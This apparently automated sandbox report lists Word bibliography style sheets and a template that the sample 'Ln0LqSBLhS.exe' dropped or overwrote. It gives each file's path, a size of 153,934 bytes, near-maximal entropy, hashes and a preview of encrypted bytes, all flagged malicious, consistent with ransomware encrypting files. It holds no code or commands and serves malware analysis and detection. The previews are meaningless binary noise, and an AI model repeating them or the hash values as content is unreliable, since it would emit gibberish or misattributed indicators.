                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998834562207103
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:N92Y3kfKvffZ2hLN4yhSIO8PhzDQboYQEqStUwkR2dosX1m9tFPNb4tS0f:N92YLHZwLN4QO8PhY5d82d38VNbmf
                                                                                                                                                                                                    MD5:4D65BA807CF2DC3A24194185D4E7262E
                                                                                                                                                                                                    SHA1:2F1079AA67F77E79C016DDF68A4609BAB604DC54
                                                                                                                                                                                                    SHA-256:D7431458C9EB2B0316B36B8AA0B9CE48EFDB93D286D842D079BC77DAD39F0C1A
                                                                                                                                                                                                    SHA-512:DBB6A78D3F6DD14F316EA3B18F3C75EDF76FA8187E79283451660145154961FF5D88BF87545667ABA21620EF7565EE7ECD9FB5F358E7014D3B8DA9A5D962D13E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....:(p.,......c..\\.-.,lNP.....~.............t.E%8.:&.-...*.WPi1...Q.Lq.2...R\z..=...]..R..;..#s^k.G....f...'...Y..yD......e.....+..{k......1.8jky..............!.1.s....sKo....N.@.U...St8.zk...Q...$&..~...#.TS..f.e...=rm......Qv.a.......).o.F...np}....KO..cKtud-../...C.{.y.N.....,..o...^"g.)..u.M...9..Y.ucj.A.."yF..Y-.a.1.T.meM.:.NS..z...b*e2Nh...V...CX<.8..3./.I.h.b...}t..:T#4..+.O.....w.F..o..h.N.d.'y.s.X.PYb... ..yR...2..-..I..B.7.M..WC>ZQ...{i..b...A..........I[..!i...W.vP$F.L*.t.......Z..M.._..0..V.X...C.\...D{..|F.9n.q...e....U.tM..g>L.uw....{..W..#.Ll......Is..W.fL.gH.....i...\.c..B^^=7..|U@.F..m..1..[...o....S...9.[......4'uD....*......e....&O...wl.U...i.Mh..;.`AY.lU....oT..Qo.~.U..'..D.#............>\.w0y.....FA..*............r&.["...n....../.q....t!z...i.ja..S..L.."L.R4....kl.o..q!{xP....2.n....B.):,A|v..{&..pRn.9...R...^P..y....^...KC.W...._..JT.I...|q..3...B?..Le..R....{.`...,.....Q_..ul?.1.x.-.L.. r.}/..o......)..(#M9n.!8...
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998750026033605
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:zVVxwgFPvcrBeHqw78F/OtIVLvRHOWBd16nkp+yLk2N0d:xVygV0rBeKw78Ymv/BSV2Ng
                                                                                                                                                                                                    MD5:2405BE452D8B8DF4D1EDD7B3F7142F76
                                                                                                                                                                                                    SHA1:230BB669CAB1B9B54A5C009EDD42376F75034014
                                                                                                                                                                                                    SHA-256:706F403951710644E93FC86537295E597DC20E7D328BF81886138DB1D1039AFE
                                                                                                                                                                                                    SHA-512:C1FB42A1FE180699EDB492950AC017BD81D1B8AAC3DBEE855A5B833AF945B0B984160016C269D64CBBD16EBA2C55CE46F45DDA4479AF2348FC0F2D43DF5DC468
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: P.3...V5Zd,........ ......!*....;..w.wY..O.>G.8...2.!..>.2..v.+B.w..nK.rJ.\l.D.Q......v.....$.....E.5W*..b..P......%.vA..4..G..>.8u.....o...5:B.r..]Oq.....-.....k..[.3k0...L8...vLv..^G.`...a..R...F$.;..ZP..\6u z..,5....f....m\N......C#c.OC...o<CC2.]...(........A:....G.`P.r@)..........V!I.9.....|E.YU.c..Q.3.|........yVk..._y.....;...,.$......6F...[.....q.W...md.E...1.3H.\..-d;.+...3.X8..:M....O..Y..!..'.r.........}0.b.t1.R...ag.t....k..?c%....b...b.@..N..].]aoWr...b...^..A-.Ho...M........|?.v..I..os..sp....N.I....t..1...x=.....}..[..].{.S.\...X.n,..{......1..|z.."......j.Y......tp.IX.JH......V..A..DC...tF&..Fs.#......55r2......r&r.k.J.K..#.mp...J*.<t.b6Z".t.Y=*.-..$.........J..C=+......M..I....y..P?......f8.6..2Ia..::U.."L.....*...nC........T..9't_....X.....$N.....n.b..Bl..b...0.K...F.K.Z..H._P.zZqm.....K.C.!...........yg.]O{..I.......2...;s.MO9..!o..).cS.8l...=...F...$.p..$=...79.<Y..J..;.A...+3uD..Ec..p.b....G.~...ZLZ!..
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.99882036987836
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:ljjrAi8EusTYmFHfhs1a+tfJ2STPNI9iAIV4CeqKsJWLwXANfca:ljwiKeH0PfR5BCCykWUXafca
                                                                                                                                                                                                    MD5:6FB4FA007C424F1AD6D24F46C691B9FD
                                                                                                                                                                                                    SHA1:74A3CC18AF87C3DCF2B23ABB997E147E763B2EA0
                                                                                                                                                                                                    SHA-256:2D30DEF6D0BCA5F576A1E228E9EA3F6E14134BC11D744B6CFC3BE7486E87AB64
                                                                                                                                                                                                    SHA-512:AEBDDDF71682C715F2F94E8222CBDC82878F622691E65FA3853B36BF47FF5B5DD5A1669F1E9288E7DB877780E3371CDB37E48E5BA998003FD33E8C5F5BB0FECC
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: /....&.|...Aq$.v%).7....Br#.g.K.&.....C.w'..../.tB,U6.C.CR....,..Q..%)8...}c..E..Y M*.i....:...?.t. c......Pm@..c&.w7.iM'.R..5N.._.o...U..2~..<U...~....e.....YZ...d1.3..l....8H.+....m...<..` .Hwa.....Y....%...z..3YT..."i@YW"r.s*..4..h.o. F|.....A.`.H8k.....2X.:.$...2}rk.6vj..h..S..S....q.i..Hf.x..}.....o..Hp.........qIhm.=.z......$.....es.*..mm....=.z...;..'c1M..'.d'#AO.S./.|......P.+....].S.9...2"..K.&F..H......bUx..KT......5?.q.8Gl-o=.bJ...X...vSv.ci"..m.f.......^..G..4...|..|.".4.M..|u...7y..5v.jX..('.qO.!.n.g\<R.oeX..%.<.......q`KP;.R.....t.&...Od..d..p5c.G.r`H5."........3@_....x.$l.}A...J.............$...0.9#.......0/..1..2.B....9%..m...t....[+H'.C..SF..!^.xu./E.....S."}.Tn.q3........Ej..f.^.._(N.....QlT2..t...@.|Pa....W6..........m...!....3R..'..bpc|.}.Hs ...W-{=&.6.....>}\.G..U5.Zf...:..!;'....Y...........jS.=.....N),...4.@.Q.%.B, Jm~u.z......0.b...x.0..?.G..%pq..X.....C......Y}B.~.L+.Y..9..<].t..p.~)4.^.i..[...:B...'..B..j.\7....h}g$
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998994449898667
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:TnIloDgHU3BrvT9Sn1ug8Lp2+ca9dDvmBGP9n/OQjJvO04InGGARqh/:MO3p9AfOcazDvE2/OWZO1gGoR
                                                                                                                                                                                                    MD5:4BA26A4D8102F5330BBAF11E2961E00D
                                                                                                                                                                                                    SHA1:B5415BE2C61E9F94169F59647C561FBC66070EE1
                                                                                                                                                                                                    SHA-256:767200705210E5DB9B03558CA7CB9EFDDB807CE74A0061880AC407A99B3BF195
                                                                                                                                                                                                    SHA-512:95F087676A488669FBCD8F6796350C091D9219DA832B1A9F27C8497E14298D66C668278B398CC3FCC9DD33DA6F2D96DE804EE7A9C4D5AF41EBF87CD1CD2F956C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .U...J.w.)YX.rqKB8@.vQ2L...+..T&.4.P.....!w[.^!..|0Bq.].XO.^'.....}v.@kj.'...(..y+fkvO.H"..Ul1......S@..C..`.H!..q...m..1.9...+2.....Y.H.......c#(.b....F..e..7b......V.%ae..:...v.?.jGK.![;.....+.`.....x...(}I..1...(`..c.o...(.oBA..j......r.GE.on...fkWm.Dk.w:..Z.../@.{...../VZ...K2..q60._q_.#..c..i...&..Y........&R..R.LL...V.N......(]/Qh}.Z..Ck....._.....,c..;3..a.J...$..#.......*..0b.m..?...!'>.....N..O.....9.-;...M.=...U.[.@.T^.m.iB.q...y..!....L..|!0....<...[_.(..:0.7FJ..t.z...Of..}...N.j.........7....y.FD..?...[P..!A..z..*.vLV.P.d..8)O...(.!'-... ..J..QC0U...D.......].....+..1..#MN..yx.96H..ub.`.A.b..*%nwq.E...#0.@..6.'P."@/.Az.O......8....^=.}..D,.6..W>Q.Wr..`.NX.w.W...v..a.sb.,......S.3..H3....K.L8..z.- .f.`...Zi..6HF1Sd.V~.G2..B...fL.k...........I.....6).Z..kM.-0...^1....c.L..I.W..!N.C.JZ...b*39.../O.v........'+.f....>).x_>..h.ka.....>..i."..&.....Q[....;VB.... ...!...2....e..#..0.n..h6.U/ Y..n.......2....=.qO.t.%...b:..%...uK.......
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998746731844698
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:H5crOwqj4cn8QUR+WlrTYuo03MEy9p2aHimCo6:HUOww4y3ZWtu0NaCf3
                                                                                                                                                                                                    MD5:3D3A393DA3B8446A8652A5D95F56359F
                                                                                                                                                                                                    SHA1:B3DA3A0666353784DB490FD90C568B51A0DAF410
                                                                                                                                                                                                    SHA-256:CD200E46C97C6F4D90ECCA4C6C3EF327EDACCA5DAD113608FFE28459376DF3D3
                                                                                                                                                                                                    SHA-512:19BFA1127FFEA4C8F7A2437D5A81F788492C454FDBA485E4BFB0319CEE2628711B6A556CEE25CB94F0C2E43CEA5B67070C82097C53D664478039CF23A7E3FE06
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ,.V.J..."..._.. .c.U.g....R....VA8d-..O.A....b.?.8...X......V.....:#..}w....Go].<.D..T.^g.l#...S9h0..........N.xb..(6.Y.:...`.kn.8...f....FM...1.<.z.......R.Y....=o.....~...N..L...O..9.f.....p..3%V.F..kN.hd...NH.o..N..|.4.I.%..~..e.... .v.;.M......H...{(.+..I.nY..j.t..,X.....Qs_...:.Q.....]8.ts.1P..VDV-..U......w.J.s..,....{....o.^Bt.......2.K.._..h...$B....;............$9<.o.C....F.....q.=tAj.S...^m..O..t.:..............(M..0FplG...|.g....< <..Ch.-..Y.....l~z.W{.8H....T...Hwt..0..9....>...{.%..]V...A.P..WE...Q(X.y0....%/.\S..U"...x..M....].8....{.O...6...9f..../...j.D.O...*.l....O........I..p...@....D..c.u.5.tJK." ....jb.0Gt8D.....8..$...S.4.`....".y*X.l.I:?/.1+.........v....?..D.D&.t.p`. .j..8....m/PFy..X<..P+.n8...s....8.j..u....Yj....&......`......_`...:5#...[.../[......:i(...oq._..D......'.B.L.......E.8.?n6C".whB.....gSTi@*j..a..m\.....5..f4..~|..V.F8{..Q.[.b[.J..j~gTp.l./t.|..']..,xt....t8.?....*.~t.T39..,s.l).0...xuUB~..
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998733155364899
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:e/8k9fapr/ARvChvG22UYpuQvNx1VEe48Wg28qSYzKqgGZ:c8k14/skvQtpuQVxJ48t28q3HZ
                                                                                                                                                                                                    MD5:CAC450AC5E60DB2EB2E2031AD9D925E2
                                                                                                                                                                                                    SHA1:9E7DED169D08EA8424B68FD90E9EB890EC26164F
                                                                                                                                                                                                    SHA-256:8495CA177536242CAABB6C12D3A0249EB56A4044698E15F2B0A3F2C23A582796
                                                                                                                                                                                                    SHA-512:AE62D90361BA3F200CAA94432F6113678583F2E54615A0890C8197CD7E46F702577F725B165B99D84AF7CC3D4FD6F04BA1CB6C00666CACF994964D52B87D9353
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...c._H.{6....R...G..B..Y.. ._.....mz.k.GF......Mn.C...Y+..o......L..:&.).g....I.m4..Ly_:SbU.S_....|.0|.nX7kZ.W.F5....W!..m{6&d7. =.~...~m..k......%uh......X..K........r......sB..(l...uIv;.....y.Uk.vb............^.W{...7......`.@..2..Y3jv.j$"u#..T..L.rJ...f|.G....#.f#X.>...g......%..........v......3o.....jJ..,.:;W ..zKE.^wz.(..F...o!.[....e.x.t.....0...6.Y.]sh....n.....-_.s.].G....n.H\.^a....p....F..f.<+v.`"K..H@B..].3T..r...c......=.F.....Hy....6Q..37.e.f..Gn......n.& ..T....0."..n`.....{V....i.{...Z.6{-&.....Y.c..IeyC...4...9.....yC'h.2Ue.dU.....h..n4..m.N*C...ZE......o.s...`.oP[*...heD."..YzT<A..|OC....^.O.....@...}...W]V.gF.gl....p.Z.r?.........2.xz.x.=...i.....:.5".0.].@u.nL?....>....,..h?k;.....'.o.p..F.U.e..,/L.,...4r.b]....A..P.Y.$..L....}.a/l.bg.r..y...5w.L.5..nvN...t....{w.mQc8....W..S| O.5Hi=.S..G....,..P'm.P....2;.7e...kS`B.2M(.lL...'......0..Z>...>.....5*...a...V.,.Z..U..m..Nq...TI...\._N.....1G...48.._2....
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998756256781089
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:bBoGPUypY5KUyxvQF6Dda9SLXgTe8sg2iP3ckf7QL9StdV1h:b2G8ypYY1vQFwU0gTJsgUk0L9ydVb
                                                                                                                                                                                                    MD5:4419C576A1173DF6A15922757662CF08
                                                                                                                                                                                                    SHA1:67F4DF77A45801F8F7F131DCF038BA1AC77675A0
                                                                                                                                                                                                    SHA-256:7979D7D5D0134B4C368A308C8F061AE2402E355954641D26B78769B141558813
                                                                                                                                                                                                    SHA-512:389F628022E22A91219D58BE1EDB2555B2215ADB2B5FA2BA98777B037973B10EDBE50505D2445CF27C2E6290EBF5FC110D1A5BB87F7754EC59EACE51FBB230A7
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ./.O...R....('>K. .X..(.C.b$.`..W_..-..\9.....M4>A-[.z.....p.O....Y.3|...[l...l.......o....A.6m.F..8w.'O2...>*.c..j.......d........H....R.L.....k\.........R.t.........|...2p...n....C..`'....NK..".g.......X..7.)...1z......[P.y.g.K.Y....*.....p]....._..N..xc...Ps.!kxIb.O..\9...e...nE.*.GcC...........a.......T....5...'..u..*zH.{j..?H......I...M.-j.jy..._*m.Kf.I.....52Z..1.,@. .Y.0 ..w....=....~...I..v.7..m+s./C.Y...s.....`........(.....e...*._1.~...u.q../N..O.X.bX..S......`...=#.vUw$!P.A.:..t.,*.`.(..!....@ .=6..g6Wn.R.,..+.<..Z...._...Xb2...5...J..M.R..%90,u.o..".Ch....D.Y^B{ ..Y.rk:D.+.F...P0ac...;l.Kr.....S.=.*.j\.1oE.)~P....L2.S..eZ.o-....g.............'C-4.1F../V.HY[sqC......B..+MY....y.-......|..a..[.........z...'.....Y.l3....{7D..hmC..uO..'.I.....Qc.~R.(!P.Onb.P...TL-.;..&>...S.k..T{7.1\].`.7"k.5...m....4.)x....[.&.,.1......b.Xu.jgZl_)`J...|..@....M.M......](u.^i32..O..,A.a.#Z.T.....S[<[\+..c......]k.i#0.:.?d....^.b..
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998819587300934
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:JL7Tmvr0RUBKNtbBjVMeirjVIEdGt1QJ9UpYdoEfIf5Kgh00:JTKAgU5VMrIEg7IkYdoEfIfogl
                                                                                                                                                                                                    MD5:4F11EF5ED3A148FB67CA0B92AFD7EE52
                                                                                                                                                                                                    SHA1:B5BB0795A615376D3CFFFA7B1326D5F4EDAE8463
                                                                                                                                                                                                    SHA-256:519F4EAEB46270530B581BFCF0D729F0637E2205C70C1D88CBB2D70F45AF16D3
                                                                                                                                                                                                    SHA-512:9AAC37EF0A32CB4CA3819FEFECA025E9DC3BAAB58637AD547C0AAA79690A4823BFDE9D707322DD6B82021E391F3327B3F802532D23D27C428A788370CEDBA818
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: x.a....Z.V.nw.......`..o..t.%..{..,]....JX!'..j~...^.W...*^.Vz..8.../.%.8..Y.'h...I....b!a.......a...C...{......`....H..M'.a...Q..U)).NO.*...(.<.C.@Dc4.+..p...^`.<.Ys...6....9..t..!.&T8.....$..|...G.o..+..C...?,.......".FU..G....(AH7......-5......R!..,...D*..)Q.....s..(.*..U....S....:.Uu`@ydO.}5....".?b.K.}?@...B...>....#....q0*..........).&i.s......"4...*.Qc.f...N.....t<......RE..s...=N.6>.p.F...9......9....X....lE..8K~.G...9YK..[.>.T..~.oK...].nL....9....f.sGN.w;......k.FF..._...B.A.K........'...[.t.A.......f.Z..SF...4&.S..2J...l.%...\c.:tK....o.x#.-..De..\....}.{...1...~pW.n.U.D...h.b.....>.Q...J.......y...4p....*%G(K.Q..|...;..}..z.6...sHn..9e!. ..&.~.G....u..h....].x...7.......Hl.U.1Tf `.....A..=..e......=H<...E.=.\D......M.8.... ..i~Y.XG...#.N.h..o.....B.1..\+....[e.+.s..,.O...'..C..@.4G(......0t(.yD..P.B. E.L.s....W~O.CpJ63.T}8.f~.]Z...H.'h..t^..b.A..v.3y......m..0>XB........B.....n.@..J.f{....h.......D.^Ka..C{.e....&..Ar..
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.9988537146772485
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:tNe00qVDDAGQXw5NlIX4fAZPmm7yHW9lflj/X9M5A/Uny3/G:tNZ00D7lIXbVm9Wbf1/Evy+
                                                                                                                                                                                                    MD5:160E96FD3F16BFF922754209DE47C135
                                                                                                                                                                                                    SHA1:83E6F5A5D79A6F50F3D76E4902637B17B39D1774
                                                                                                                                                                                                    SHA-256:E2855738F9FB114E7003157100DDE34C9BAF5760F971CC947722708CFE2E9114
                                                                                                                                                                                                    SHA-512:1E234035DB4F11442A76FF3D1B1F0E481928B7E1A09EBD23C0A57F664B2A8395E8F1C693CACB89DE22259D6F444CDEC303073851298F8D09FD61957279A0F15A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: L...pwrz.....=....eRI.C.k.&..8..B.pj.uY....M..hX.M...DIMs....eG_.}N..2Q............F..P.Q.......u@.R...:.&u...6#4..z.]/E?_b...g.P.%;QQ..c.....,d%2..y9.ZT.....i...m....V....8..c.......Z5.J.cK.n{........V..5NG.3.!8.....h.}W.BE.;RKI.w..u.....t.o..(A..D..[..X......."..T....+..t...5....8....Q.Z+.K..R......"T...nbl..;kYR.E..f..dp......P.[..ePu.Zzy.#.;N....S.....q.?.t.O/.L.8vK. .....B&...#..^......:.O....d..G.1$X ....t$.Lb)......'S....DA.aJK<.w..'....z.{.i.KeJ.m..#...OEi[0.g.............A8..5d.3.l`..;O....N..I..E..8.$1V3Ma.......E.i......`..`>..M.ZT..c....z..v+.....`.T.....Z......}..#Y.@.Z/......H5p..G&'(..|....F$..;.M......@s."d.z.!.......$.$*...m..:..E....)^..Pt..-....H..H..xY..h.M..'..f.y..X..\.fT..C..T..O..c.,.../.B...z!..!....#V.p.`h.Y.G...X...6..{........R$:...<4.........(%....%{p.a..a0.z..H..O8~.E..Y..e&d.rK.^A\..y0..j.p7D.../...s......B..... 0y_:.....Y..7A!X..%..~..d...R..t...jo......;Ht.wm...!u.l....hp.=I.5.].>n.7.I.d....bD1}g..|..
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998803011341882
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:ANhxf123SfwZvZ698cqqdCdVlOMz/oA4ka82UDJJ7vZEq4:ANrA3c8JcqjdVU8FbLvZEZ
                                                                                                                                                                                                    MD5:98295A9FF831DABCB9AB433A4B75015C
                                                                                                                                                                                                    SHA1:E5B9DE9BB7A0C150B5E853F3F1C8569E2F976A6A
                                                                                                                                                                                                    SHA-256:CED50508F40AE56E621E4F1F7CB3221486BE1B47839F0934C52273FDE86FBC8B
                                                                                                                                                                                                    SHA-512:9920E873A125FCB891861CCB5567C5DA7025CDD9AAFD3E655C2494645465FEE9F7B012F47BEC313643E8F891E54129C97169D254BFE6254C2930ACC829A13DB3
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .c.&.!....U...~..~...._].....),@....!u.W..9..s.yq..d.v2..t...?q>%X.B).q:..z.._..).^.2....%..f...ZJ.......'.f.[Y..@...&.,.h.r...d..X.S.....j..j.4....^....K......l...#.]9>........V-..bp....U.L....e...-.1.}.[.....nf........s..g.s...[.....Z._,.QRF.^.....&B.Q=........".|.$.7..%..$.._.=.B/.+~......%..).5......UMklBnX...{R1..j...q. <j...?..H..pZ.y9.Qd....P...j.!_..vyo4.....D&.s."....&.w7....v.E......5.._PqKc.......6"R....C.... ..oC}\...N...(x.F.4.Q...c.4..\.W1X..|........`..{w..A.^r..{\...$...xzR....c....a...X..t.e@f1..i$......=.Z...kI.....G..4..gt.{..Iil6'q...D.n.B.Y...R..9.....[......I......A.....igh.m.&..H..Z.8V.xs.T......)......+e............cX.#..=..0....8@..)....3.E_"w....B.h.&.f.....o.B.J......p..4.2.....J.........<....$V...f8....d&.6Al.ff.[.!.Od...[MU...F. ..q8.H..:TO......K|+.....n....~.7. ........9....W..y....@@Y....\....o....t.`.l.,...N.Y..u. ...=..P......C...l...]....)k..pA...!O.gX.q.2c.P...g.....3....3...C...4S8<T....!.$M.
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998691797753759
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:AyqbmYxiDK2NM0w/VNGllm0pGneyGRcspn6YoCsyE/uz74ZpCIgzBK:YbmYxid6VNEmmxnXoTyz74ZpCflK
                                                                                                                                                                                                    MD5:67F2048AFA108A737E8BCA282162806F
                                                                                                                                                                                                    SHA1:EDB187FE8D719CD9A5888150699C3DF432884CBB
                                                                                                                                                                                                    SHA-256:F0775898635D90A7DD5B59CBF5D1812BA408A1D25F7F4C0C15532FC0BF53F59E
                                                                                                                                                                                                    SHA-512:B9F7AD542AAB16060BE008FEDA7051FDC0F21A18C7E78C60E7A29133D4C96C54C4EE145B7FE0E9CEAAA286C45EF933CD5509CDD87E1294940E7B010F708A11DF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .3...+B5...:.."&...>1..m.#.j... ........ ...>C.{...aD...^.{.H....j.......=~mMa.....j.. .K..Wl.......S.z.{.4..=n..c=.w`...*... 9A..$...p..3......z'......>Ds..*;IS.....u..H.......B..".&..W>.....dT...0...|.A. .......~...R...O...op...E.`...C.uf...o)....x.}avK<....!.fr.0.....m.'.S....6T|..`..M..w..j.L.H.w..3aA.........].<....Z.b.-lX.3*.U.~...)..(_...o.z...:...t...<............=.a.|._4V*....LC+.&..J..;%..e...m...........vhz.. ....V.n<[X.\..E...r.T..'...(&L._ *.v...;.l.d%?O..r..&.....b..[bw.iZK...0.%::X..>B..g..45G_....t.v..8?...X.3S.}.{C......f.C o>V....5.dX..&..-q.g....+.(t................R[.....M..?..A....:.....!..`V..k..B....2..9.1+_...'".O.fo@ ..7..v....Q..=Z.(.P..t.:...NS....b.^]s.....>....(F..p...(..s..8!..!t.......@....yQr{.x...rBx%.DS....g1D.YL.6.{!...:j...PPW..*l-.(...O.3X...Ou[.D..!.-m..!.p._2..J...-.^.*../P.-....-t.<.2...:....5......}........G5A.....p!.8c.1....i...})9k...8.1N.h......k..5...k_%>.Y..D..6L...pB....T../L_.i.q.k.....pI..
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998869516247606
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:m+rZ4zqz6RsJATMIY6B3qcYcxISLT44mIzA/miAl51r2OQSpQjG:mMZnGRgIY77Sw4mIzfpSSpQy
                                                                                                                                                                                                    MD5:A35276EB422642324F9FB8754C79F4A5
                                                                                                                                                                                                    SHA1:5D47FCF378672D8587EF17B89D3058B5CA66C4D2
                                                                                                                                                                                                    SHA-256:A2F14F1A8F00C59FF06D46FF941B63D1F9A58F2B2C4FA3BC74A00C1313C33820
                                                                                                                                                                                                    SHA-512:EE3BDCC0A1F0F1299FD2E13EE0BBCC63750887A832CE987C34DEA828F6E620EB4B7D133D2A93566C94C0442B5703D49C22E4181B2F083155E8F3CDCD69474BC9
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .zB..lB...N.?Tu.p'.0....:i.V.lf.FuV....... z.....l....:.z5J.@....x..A....Y..&',w.Zl....w.Jj...<....-}.m.U'...u0.......@.U....~D ......{._.......os..<T..u..k&...bB..oi.6....Pa.;Y.L.[C...c.}M.....4}....q....].fH(.aT./....9.....9...77........*"...]...-.....C6(Q4..s.E.M.......3.~v6..P.xIa..n./[...y.9..R.&.>...U.Lrd.#._...A...U.0.$..M.....EkM.S.......q.......{...y4..E..."m.*]p....G....PN B...F.....R..........L..i......I...a.^5_E'X.~.6.~2..M.?.......\wA...7.d`.m..cL49s.G.e......k..'<.}.y..k..[.U|<...R.^R.c:.O.!2.v..b...v.7.]S......c5...-.....R.\'....zv?..k.|.G.1#?e....{..t.H..;.S.=.c.. ........." .=......1|Z~s.....c.M....N(.gh...'..]z......{.....{....&....C....Yad.......,...x...<." ...N2|J....K......R.H9...0...jt.W..3=..=y.:._^.$.rj.....aM...3[.N.[0e..G`P....+N2i.....Ae&...7..*...X!.J....O..{U....@.X..e..S~...;...........=..$f..B{U..........w0=(.e.?..X..YC,...]_.B`.E.b...\..8..a......s....h.T.....J..P.+..U.....&<..A.q... ..YG.,C..7Zg.>.f9x..
